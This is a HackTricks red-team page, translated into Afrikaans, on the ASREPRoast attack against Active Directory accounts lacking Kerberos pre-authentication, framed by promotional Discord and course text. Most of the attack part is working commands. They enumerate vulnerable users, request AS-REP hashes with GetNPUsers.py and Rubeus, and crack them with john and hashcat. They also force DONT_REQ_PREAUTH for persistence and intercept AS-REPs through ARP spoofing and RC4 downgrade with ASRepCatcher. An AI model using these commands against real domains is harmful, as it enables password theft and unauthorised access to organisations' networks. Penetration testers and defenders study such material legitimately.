ASREPRoast

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Sluit aan by HackenProof Discord bediener om met ervare hackers en foutbeloningsjagters te kommunikeer!

Hacking-insigte Raak betrokke by inhoud wat die opwinding en uitdagings van hack bevat

Haknuus in Werklikheid Bly op hoogte van die snelveranderende hackwêreld deur werklikheidsnuus en insigte

Nuutste Aankondigings Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platformopdaterings

Sluit by ons aan op Discord en begin vandag saamwerk met top hackers!

ASREPRoast

ASREPRoast is 'n sekuriteitsaanval wat gebruikers aanval wat die Kerberos-voorafverifikasie vereiste kenmerk ontbreek. Hierdie kwesbaarheid maak dit essensieel vir aanvallers om verifikasie vir 'n gebruiker van die Domeinbeheerder (DC) aan te vra sonder om die gebruiker se wagwoord nodig te hê. Die DC reageer dan met 'n boodskap wat versleutel is met die gebruiker se wagwoord-afgeleide sleutel, wat aanvallers kan probeer kraak om die gebruiker se wagwoord te ontdek.

Die hoofvereistes vir hierdie aanval is:

  • Gebrek aan Kerberos-voorafverifikasie: Teikengebruikers moet hierdie sekuriteitsfunksie nie geaktiveer hê nie.

  • Koppeling met die Domeinbeheerder (DC): Aanvallers het toegang tot die DC nodig om versoek te stuur en versleutelde boodskappe te ontvang.

  • Opsionele domeinrekening: Die besit van 'n domeinrekening stel aanvallers in staat om kwesbare gebruikers meer doeltreffend te identifiseer deur LDAP-navrae. Sonder so 'n rekening moet aanvallers gebruikersname raai.

Identifisering van kwesbare gebruikers (benodig domeinlegitimasie)

Gebruik van Windows
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
Gebruik van Linux
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName

Versoek AS_REP-boodskap

Gebruik Linux
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
Gebruik van Windows
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

AS-REP Roasting met Rubeus sal 'n 4768 genereer met 'n enkripsie tipe van 0x17 en voorafgoedkeuring tipe van 0.

Kraak

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Volharding

Dwing preauth nie vereis vir 'n gebruiker waar jy GenericAll toestemmings het (of toestemmings om eienskappe te skryf):

Gebruik van Windows
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Gebruik van Linux
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH

ASREProast sonder geloofsbriewe

'n Aanvaller kan 'n man-in-die-middel-posisie gebruik om AS-REP-pakkette vas te vang terwyl hulle die netwerk deurloop sonder om te staat te wees op Kerberos-voorafverifikasie wat uitgeskakel is. Dit werk dus vir alle gebruikers op die VLAN. ASRepCatcher stel ons in staat om dit te doen. Verder dwing die gereedskap klientewerkstasies om RC4 te gebruik deur die Kerberos-onderhandeling te verander.

# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP

# Disabling ARP spoofing, the mitm position must be obtained differently
ASRepCatcher relay -dc $DC_IP --disable-spoofing

# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen

Verwysings


Sluit aan by HackenProof Discord bediener om met ervare hackers en foutbeloningsjagters te kommunikeer!

Hack-insigte Gaan in gesprek met inhoud wat die opwinding en uitdagings van hack bekyk

Hack Nuus in Werklikheid Bly op hoogte van die snelbewegende hackwêreld deur werklikheidsnuus en insigte

Nuutste Aankondigings Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platformopdaterings

Sluit by ons aan op Discord en begin vandag saamwerk met top hackers!

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated